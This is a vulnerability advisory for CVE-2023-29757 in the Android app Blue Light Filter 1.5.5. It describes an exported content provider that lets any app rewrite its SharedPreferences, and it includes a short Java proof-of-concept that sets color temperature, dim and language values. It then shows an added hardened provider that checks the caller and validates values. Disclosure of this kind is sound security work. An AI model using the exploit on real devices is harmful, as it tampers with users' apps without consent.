CVE-2023-29757: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Escalation of Privileges exists in Blue Light Filter (CVE-2023-29757)
Vendor: Leap Fitness Group (https://leap.app/)
Affected product: Blue Light Filter (com.eyefilter.nightmode.bluelightfilter)
Version: 1.5.5
Download link: https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter
Description of the vulnerability for use in the CVE: An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Additional information: The Blue Light Filter application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change the application’s color temperature by modifying the current_ct field in the SharedPreference file, causing the phone to display abnormally and resulting in an elevation of privilege attack.
PoC:
import android.content.ContentResolver;
import android.content.ContentValues;
import android.net.Uri;

public void attack_eye() {
    ContentResolver contentResolver = getContentResolver();
    ContentValues contentValues = new ContentValues();
    Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE_AUTHORITY/a/a");
    contentValues.put("dim", 50);
    contentValues.put("filter_capacity", 100000);
    contentValues.put("language_index", -1); // set the language
    contentValues.put("current_ct", 600); // set the current color temperature
    contentResolver.insert(uri, contentValues);
}
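One way the provider side could refuse the write described above, as an added example that is not the vendor's code or part of the original advisory: a ContentProvider whose insert() checks the caller's UID and validates each value before it reaches SharedPreferences. The class name, preference file name and numeric ranges are assumptions; only the keys current_ct and dim come from the page.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.content.SharedPreferences;
import android.database.Cursor;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;

// Added example: class name, prefs file name and numeric bounds are assumptions.
public class HardenedPrefsProvider extends ContentProvider {
    private static final String PREFS = "settings";        // assumed file name
    private static final int CT_MIN = 1000, CT_MAX = 6500; // assumed valid range

    @Override public boolean onCreate() { return true; }

    @Override
    public Uri insert(Uri uri, ContentValues values) {
        // Reject any caller outside this app's UID, so a manifest mistake
        // (android:exported="true", no permission) does not expose writes.
        if (Binder.getCallingUid() != Process.myUid()) {
            throw new SecurityException("caller may not write preferences");
        }
        if (values == null) return null;
        SharedPreferences.Editor editor = getContext()
                .getSharedPreferences(PREFS, Context.MODE_PRIVATE).edit();
        // Only allow-listed keys are persisted, each range-checked first;
        // a failed check throws before apply(), so nothing is stored.
        putChecked(editor, values, "current_ct", CT_MIN, CT_MAX);
        putChecked(editor, values, "dim", 0, 100);
        editor.apply();
        return uri;
    }

    private static void putChecked(SharedPreferences.Editor editor,
                                   ContentValues values, String key, int min, int max) {
        Integer v = values.getAsInteger(key);
        if (v == null) return; // key absent or not an integer: nothing stored
        if (v < min || v > max) {
            throw new IllegalArgumentException(key + " out of range: " + v);
        }
        editor.putInt(key, v);
    }

    // This provider only accepts validated inserts; other operations do nothing.
    @Override public Cursor query(Uri u, String[] p, String s, String[] a, String o) { return null; }
    @Override public String getType(Uri u) { return null; }
    @Override public int update(Uri u, ContentValues v, String s, String[] a) { return 0; }
    @Override public int delete(Uri u, String s, String[] a) { return 0; }
}
```

Declaring the provider with android:exported="false" in the manifest is the first line of defense; the in-code UID check keeps the write path closed if that attribute is later changed.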